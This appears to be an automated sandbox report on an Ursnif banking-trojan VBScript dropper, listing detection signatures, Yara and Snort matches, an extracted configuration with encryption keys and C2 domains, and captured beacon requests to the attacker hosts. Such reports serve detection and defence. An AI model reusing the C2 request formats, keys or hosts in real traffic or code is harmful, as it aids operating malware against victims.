Windows Analysis Report start[526268].vbs

Overview

General Information

Sample Name: start[526268].vbs
Analysis ID: 480986
MD5: b0de0a696f7b17724fef5c5e0af2bd1d
SHA1: 3de72b8cae6a84f82e05cae18f48a1a302dbebc3
SHA256: e3a1fb3e932aae628aa08bde31be3b30861fa90ca16db4f81d7989093e1fddbe
Tags: vbs
Infos:

Most interesting Screenshot:

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Sigma detected: Powershell run code from registry
Benign windows process drops PE files
VBScript performs obfuscated calls to suspicious functions
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Sigma detected: Encoded IEX
Hooks registry keys query functions (used to hide registry keys)
Maps a DLL or memory area into another process
Compiles code for process injection (via .Net compiler)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Creates processes via WMI
Suspicious powershell command line found
Modifies the prolog of user mode functions (user mode inline hooks)
Sigma detected: MSHTA Spawning Windows Shell
Deletes itself after installation
Modifies the context of a thread in another process (thread injection)
Sigma detected: Mshta Spawning Windows Shell
Creates a thread in another existing process (thread injection)
Sigma detected: Suspicious Csc.exe Source File Folder
Modifies the export address table of user mode modules (user mode EAT hooks)
Writes registry values via WMI
Modifies the import address table of user mode modules (user mode IAT hooks)
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Queries the installation date of Windows
Internet Provider seen in connection with other malware
Detected potential crypto function
Stores large binary data to the registry
Contains functionality to query CPU information (cpuid)
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
AV process strings found (often used to terminate AV products)
PE file does not import any functions
Java / VBScript file with very long strings (likely obfuscated code)
Searches for the Microsoft Outlook file path
Drops PE files
Uses a known web browser user agent for HTTP communication
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Launches processes in debugging mode, may be used to hinder debugging
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

AV Detection:

barindex
Found malware configuration
Source: 00000027.00000002.678335130.0000019D8B7B0000.00000040.00000001.sdmp Malware Configuration Extractor: Ursnif {"RSA Public Key": "4AYdzflNRXYlq5A89hwCjrU+QvoXxjpdUxRPAdq3bBwI9ExkYDjHy9AWeshiGXrgIzFlNVtLrifcFS4LJjRxWiTG6Fca4Vt6MI5WOos+fChdUStUtjzPhvjxLI5XIPSBz5r2O1dlmC1xuOEDpRs8BbpWGdZ2yYEdD2dU4efFbSK7SBcRAao3mGwKzc2GlmjegxJ/fScW81u3keNnZqy2SbgEIUg5Ycv4J3eUirSdWDASxFovB3C3eAKRiuRkEzJcRqU2y9vVOyCbmx6uiVNonJWQxMoDxpw6mwokGsvtDFEgCJXMl+lbKlUaqdSAUK0Tij5ay8sYpetWDvt4nCFDVBf09fSWTGo06hdy0B5+I4w=", "c2_domain": ["art.microsoftsofymicrosoftsoft.at", "r23cirt55ysvtdvl.onion", "fop.langoonik.com", "poi.redhatbabby.at", "pop.biopiof.at", "l46t3vgvmtx5wxe6.onion", "v10.avyanok.com", "apr.intoolkom.at", "fgx.dangerboy.at"], "ip_check_url": ["curlmyip.net", "ident.me", "l2.io/ip", "whatismyip.akamai.com"], "serpent_key": "rQH4gusjF0tL2dQz", "server": "580", "sleep_time": "5", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "600", "time_value": "600", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "240", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "240", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "2500", "SetWaitableTimer_value": "60"}
Antivirus detection for URL or domain
Source: http://atl.bigbigpoppa.com/NhQOwDmOWNWhoZkCuvIJYT/yyrgcNktQOio5/MAWNnOPh/YOpi6p7HZNMrM8dfCZNfhKR/6onGC0_2Fj/Z9tF912mepKiyl36W/W4huWMRggYfW/XcsWaKpGEUD/RLGSHFoZE1byyc/rlBcayy_2BaEyDegqhXic/uK_2B61p_2BSvpFm/KyqmkPSMKG7KXQh/rKyHlYF1pKbQ_2FrYs/GJ_2FCBgc/9AGhinNAfGtoNp19N2M0/VRQmCiVDj4baSUAqCoz/3V8nTzokn2tRxlMEPZAuLu/2tgH0PvXzWJgh/YQdIJgxg/bNHS_2BzqfAV52iuY_2FTg4/1Z1d8SkfRiehoMkV7n/yUZu Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: atl.bigbigpoppa.com Virustotal: Detection: 8% Perma Link

Cryptography:

barindex
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 34_2_01203276 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError, 34_2_01203276
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\1cv1ijms\1cv1ijms.pdb source: powershell.exe, 00000027.00000002.694302202.0000019D8EDD4000.00000004.00000001.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\1cv1ijms\1cv1ijms.pdbXP source: powershell.exe, 00000027.00000002.694302202.0000019D8EDD4000.00000004.00000001.sdmp
Source: Binary string: c:\Led-Flower\Spell\cotton_point\please.pdb source: wscript.exe, 00000000.00000003.391888818.000002CC178CF000.00000004.00000001.sdmp, fum.cpp.0.dr
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\hvjfk3yo\hvjfk3yo.pdb source: powershell.exe, 00000027.00000002.694302202.0000019D8EDD4000.00000004.00000001.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\hvjfk3yo\hvjfk3yo.pdbXP source: powershell.exe, 00000027.00000002.694302202.0000019D8EDD4000.00000004.00000001.sdmp

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49790 -> 185.251.90.253:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49790 -> 185.251.90.253:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49791 -> 185.251.90.253:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49791 -> 185.251.90.253:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49792 -> 185.251.90.253:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49793 -> 185.251.90.253:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49793 -> 185.251.90.253:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe Domain query: atl.bigbigpoppa.com
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 185.251.90.253 80 Jump to behavior
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: SPRINTHOSTRU SPRINTHOSTRU
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 185.251.90.253 185.251.90.253
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /NhQOwDmOWNWhoZkCuvIJYT/yyrgcNktQOio5/MAWNnOPh/YOpi6p7HZNMrM8dfCZNfhKR/6onGC0_2Fj/Z9tF912mepKiyl36W/W4huWMRggYfW/XcsWaKpGEUD/RLGSHFoZE1byyc/rlBcayy_2BaEyDegqhXic/uK_2B61p_2BSvpFm/KyqmkPSMKG7KXQh/rKyHlYF1pKbQ_2FrYs/GJ_2FCBgc/9AGhinNAfGtoNp19N2M0/VRQmCiVDj4baSUAqCoz/3V8nTzokn2tRxlMEPZAuLu/2tgH0PvXzWJgh/YQdIJgxg/bNHS_2BzqfAV52iuY_2FTg4/1Z1d8SkfRiehoMkV7n/yUZu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: atl.bigbigpoppa.com
Source: global traffic HTTP traffic detected: GET /JWEVOwMBnh_2FtPS/WMS3RPVZyjTSnTq/9Hxp202Yz5PgJEOrB6/nF_2FNmSa/SQyIRZk5j_2B3OcT7rdM/7npsCxfJSu8JbD_2FiM/y1HBEgDsmQFEPX27nGHHbz/zR0jF_2FnlVo0/Nxk3zALE/ofyPMDXzWjS1IpBinC5Sz4W/cf_2F5pD8G/46Dgl0akFp2cXbFnY/HwtGCbH5Q64m/f9VXk69LnhQ/x_2B8W86eQh4Rn/mNr7OMCC6GA9c9ph_2Bg7/ddhYlIa8YUPQgtGC/8R2fSBf4sQLaQ_2/FLycNJhDT_2FxWMMIH/41wPmVaCG/UdSw_2BuW4yZulffApAL/Gvq14U65qaj/9np83 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: atl.bigbigpoppa.com
Source: global traffic HTTP traffic detected: GET /gO6fEM48Z2VyJYyEaQk/Tlg2ka7bPKYxRb_2B442I_/2FFZLVL8c_2BN/KPEiurg_/2FQFW58y_2BC5_2BoQJsMfC/Z20kSl3bCK/Qe_2BCo_2BI8EhVfz/gaTQA1FJpKmh/Okd_2B3iR1p/U_2F_2F_2BxYfZ/z_2B8obDRzLj_2BvPtXpS/MutYXow3kjfHv8Ne/Tk41k1QbLs08co6/pw6aojLzb_2BsMklC7/1luisc2vx/yYmG1Q6eqChu6qOfd2lR/zgadpa0en2mVI5QE7we/rWllKXh4B6iqFxDAWQqk8G/Oj17QsJan3SWq/MhUPAmuR/Yiolc5JDgbwuOe67l9VgfXi/kgInUUiADdo06Z7N/8 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: atl.bigbigpoppa.com
Source: global traffic HTTP traffic detected: GET /fpsVrgA85_2/BZUV9Iws3c_2Fj/GkkWmnklFKPgFBQ8hMP6W/ISGgirn8yOZisrZs/5_2BH8scRlnvRek/EGKptIwp8lSo93GFx6/ymWkd9jdg/4KpkPYuuZAAAek8BuLEK/tznSDyfWtC0KjQGP2d_/2BrsiHfOmQlV7YgPTes0MP/b6lv_2B55mg9j/CZcF_2Fn/c7jP_2BxBvmhfldW4gAwZkY/uow0BznEMg/Wu3a_2FnHyKBj_2BJ/8ZnXzqvUM8Ze/cMFtkguu1z4/ENTz8901wZ21V2/97iMfuV3Gozq6_2FCxmu3/2vuyb0vOGb_2B1J_/2BS8kN2df/902r HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0Host: art.microsoftsofymicrosoftsoft.at
Source: global traffic HTTP traffic detected: POST /E5wXpiwar/wRvu2gZe47zRdlNBgcs0/eOhrCgUr4ZXAn_2BZqF/9q3EAQRMUh_2B_2F33UbfY/IXr06mXceQHe3/2iAe1c3a/9nqOhYkWYxxgxCOECBlwLnA/sWEj3oJk5h/PRzUbXzmSIea8A2EU/_2FwPSG35Krj/kfkkMNBeoRA/5ZUbFMHjnJYo4_/2Fjo7tU3n9R4Z09v5Qh4q/QBVxo02azbkNlwWF/Bex9GHi32MTaVfj/GKDsgaU6HjZIpEcGiU/Q_2FxW4S4/w_2F825rdJVVRhGtH6Fv/DcD1MSlvdu470uFUctq/iMqZ2HgnOsvQUh/nmg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0Content-Length: 2Host: art.microsoftsofymicrosoftsoft.at
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Sep 2021 05:02:45 GMTContent-Type: text/html; charset=utf-8Content-Length: 146Connection: closeVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: powershell.exe, 00000027.00000002.677979658.0000019D8B650000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000027.00000002.698930392.0000019D9B8AE000.00000004.00000001.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000027.00000002.678851072.0000019D8BA60000.00000004.00000001.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000027.00000002.678446802.0000019D8B851000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000027.00000002.678851072.0000019D8BA60000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000027.00000002.698930392.0000019D9B8AE000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000027.00000002.698930392.0000019D9B8AE000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000027.00000002.698930392.0000019D9B8AE000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000027.00000002.678851072.0000019D8BA60000.00000004.00000001.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000027.00000002.698930392.0000019D9B8AE000.00000004.00000001.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: unknown HTTP traffic detected: POST /E5wXpiwar/wRvu2gZe47zRdlNBgcs0/eOhrCgUr4ZXAn_2BZqF/9q3EAQRMUh_2B_2F33UbfY/IXr06mXceQHe3/2iAe1c3a/9nqOhYkWYxxgxCOECBlwLnA/sWEj3oJk5h/PRzUbXzmSIea8A2EU/_2FwPSG35Krj/kfkkMNBeoRA/5ZUbFMHjnJYo4_/2Fjo7tU3n9R4Z09v5Qh4q/QBVxo02azbkNlwWF/Bex9GHi32MTaVfj/GKDsgaU6HjZIpEcGiU/Q_2FxW4S4/w_2F825rdJVVRhGtH6Fv/DcD1MSlvdu470uFUctq/iMqZ2HgnOsvQUh/nmg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0Content-Length: 2Host: art.microsoftsofymicrosoftsoft.at
Source: unknown DNS traffic detected: queries for: atl.bigbigpoppa.com
Source: global traffic HTTP traffic detected: GET /NhQOwDmOWNWhoZkCuvIJYT/yyrgcNktQOio5/MAWNnOPh/YOpi6p7HZNMrM8dfCZNfhKR/6onGC0_2Fj/Z9tF912mepKiyl36W/W4huWMRggYfW/XcsWaKpGEUD/RLGSHFoZE1byyc/rlBcayy_2BaEyDegqhXic/uK_2B61p_2BSvpFm/KyqmkPSMKG7KXQh/rKyHlYF1pKbQ_2FrYs/GJ_2FCBgc/9AGhinNAfGtoNp19N2M0/VRQmCiVDj4baSUAqCoz/3V8nTzokn2tRxlMEPZAuLu/2tgH0PvXzWJgh/YQdIJgxg/bNHS_2BzqfAV52iuY_2FTg4/1Z1d8SkfRiehoMkV7n/yUZu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: atl.bigbigpoppa.com
Source: global traffic HTTP traffic detected: GET /JWEVOwMBnh_2FtPS/WMS3RPVZyjTSnTq/9Hxp202Yz5PgJEOrB6/nF_2FNmSa/SQyIRZk5j_2B3OcT7rdM/7npsCxfJSu8JbD_2FiM/y1HBEgDsmQFEPX27nGHHbz/zR0jF_2FnlVo0/Nxk3zALE/ofyPMDXzWjS1IpBinC5Sz4W/cf_2F5pD8G/46Dgl0akFp2cXbFnY/HwtGCbH5Q64m/f9VXk69LnhQ/x_2B8W86eQh4Rn/mNr7OMCC6GA9c9ph_2Bg7/ddhYlIa8YUPQgtGC/8R2fSBf4sQLaQ_2/FLycNJhDT_2FxWMMIH/41wPmVaCG/UdSw_2BuW4yZulffApAL/Gvq14U65qaj/9np83 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: atl.bigbigpoppa.com
Source: global traffic HTTP traffic detected: GET /gO6fEM48Z2VyJYyEaQk/Tlg2ka7bPKYxRb_2B442I_/2FFZLVL8c_2BN/KPEiurg_/2FQFW58y_2BC5_2BoQJsMfC/Z20kSl3bCK/Qe_2BCo_2BI8EhVfz/gaTQA1FJpKmh/Okd_2B3iR1p/U_2F_2F_2BxYfZ/z_2B8obDRzLj_2BvPtXpS/MutYXow3kjfHv8Ne/Tk41k1QbLs08co6/pw6aojLzb_2BsMklC7/1luisc2vx/yYmG1Q6eqChu6qOfd2lR/zgadpa0en2mVI5QE7we/rWllKXh4B6iqFxDAWQqk8G/Oj17QsJan3SWq/MhUPAmuR/Yiolc5JDgbwuOe67l9VgfXi/kgInUUiADdo06Z7N/8 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: atl.bigbigpoppa.com
Source: global traffic HTTP traffic detected: GET /fpsVrgA85_2/BZUV9Iws3c_2Fj/GkkWmnklFKPgFBQ8hMP6W/ISGgirn8yOZisrZs/5_2BH8scRlnvRek/EGKptIwp8lSo93GFx6/ymWkd9jdg/4KpkPYuuZAAAek8BuLEK/tznSDyfWtC0KjQGP2d_/2BrsiHfOmQlV7YgPTes0MP/b6lv_2B55mg9j/CZcF_2Fn/c7jP_2BxBvmhfldW4gAwZkY/uow0BznEMg/Wu3a_2FnHyKBj_2BJ/8ZnXzqvUM8Ze/cMFtkguu1z4/ENTz8901wZ21V2/97iMfuV3Gozq6_2FCxmu3/2vuyb0vOGb_2B1J_/2BS8kN2df/902r HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0Host: art.microsoftsofymicrosoftsoft.at

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000022.00000003.629988077.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.629867995.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.630014606.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.636741172.000000000556C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.629893415.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.630002882.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.629914117.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.629947951.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.632901205.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.629835886.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 3128, type: MEMORYSTR
Source: Yara match File source: 34.3.rundll32.exe.566a4a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.3.rundll32.exe.5718d48.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.3.rundll32.exe.566a4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.3.rundll32.exe.5718d48.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.3.rundll32.exe.56e94a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000027.00000002.678335130.0000019D8B7B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.635124598.00000000056E9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.635073393.000000000566A000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.678786013.00000000053EF000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.699212470.0000019D9BA17000.00000004.00000001.sdmp, type: MEMORY

E-Banking Fraud:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000022.00000003.629988077.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.629867995.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.630014606.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.636741172.000000000556C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.629893415.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.630002882.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.629914117.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.629947951.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.632901205.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.629835886.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 3128, type: MEMORYSTR
Source: Yara match File source: 34.3.rundll32.exe.566a4a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.3.rundll32.exe.5718d48.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.3.rundll32.exe.566a4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.3.rundll32.exe.5718d48.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.3.rundll32.exe.56e94a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000027.00000002.678335130.0000019D8B7B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.635124598.00000000056E9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.635073393.000000000566A000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.678786013.00000000053EF000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.699212470.0000019D9BA17000.00000004.00000001.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 34_2_01203276 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError, 34_2_01203276

System Summary:

barindex
Writes registry values via WMI
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Detected potential crypto function
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 34_2_01201754 34_2_01201754
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 34_2_01207E30 34_2_01207E30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 34_2_0120725F 34_2_0120725F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_0000019D8B7CE95C 39_2_0000019D8B7CE95C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_0000019D8B7DB948 39_2_0000019D8B7DB948
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_0000019D8B7DB230 39_2_0000019D8B7DB230
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_0000019D8B7D5164 39_2_0000019D8B7D5164
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_0000019D8B7C1164 39_2_0000019D8B7C1164
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_0000019D8B7C4150 39_2_0000019D8B7C4150
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_0000019D8B7B0000 39_2_0000019D8B7B0000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_0000019D8B7B2138 39_2_0000019D8B7B2138
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_0000019D8B7C0124 39_2_0000019D8B7C0124
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_0000019D8B7CA9F8 39_2_0000019D8B7CA9F8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_0000019D8B7C7820 39_2_0000019D8B7C7820
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_0000019D8B7B1000 39_2_0000019D8B7B1000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_0000019D8B7B90FC 39_2_0000019D8B7B90FC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_0000019D8B7C70C8 39_2_0000019D8B7C70C8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_0000019D8B7D88B8 39_2_0000019D8B7D88B8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_0000019D8B7CF7B4 39_2_0000019D8B7CF7B4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_0000019D8B7E4796 39_2_0000019D8B7E4796
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_0000019D8B7CA790 39_2_0000019D8B7CA790
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_0000019D8B7B3610 39_2_0000019D8B7B3610
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_0000019D8B7D2EF8 39_2_0000019D8B7D2EF8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_0000019D8B7B76F4 39_2_0000019D8B7B76F4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_0000019D8B7D5ED8 39_2_0000019D8B7D5ED8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_0000019D8B7CC6C4 39_2_0000019D8B7CC6C4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_0000019D8B7C2EC0 39_2_0000019D8B7C2EC0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_0000019D8B7D06B4 39_2_0000019D8B7D06B4
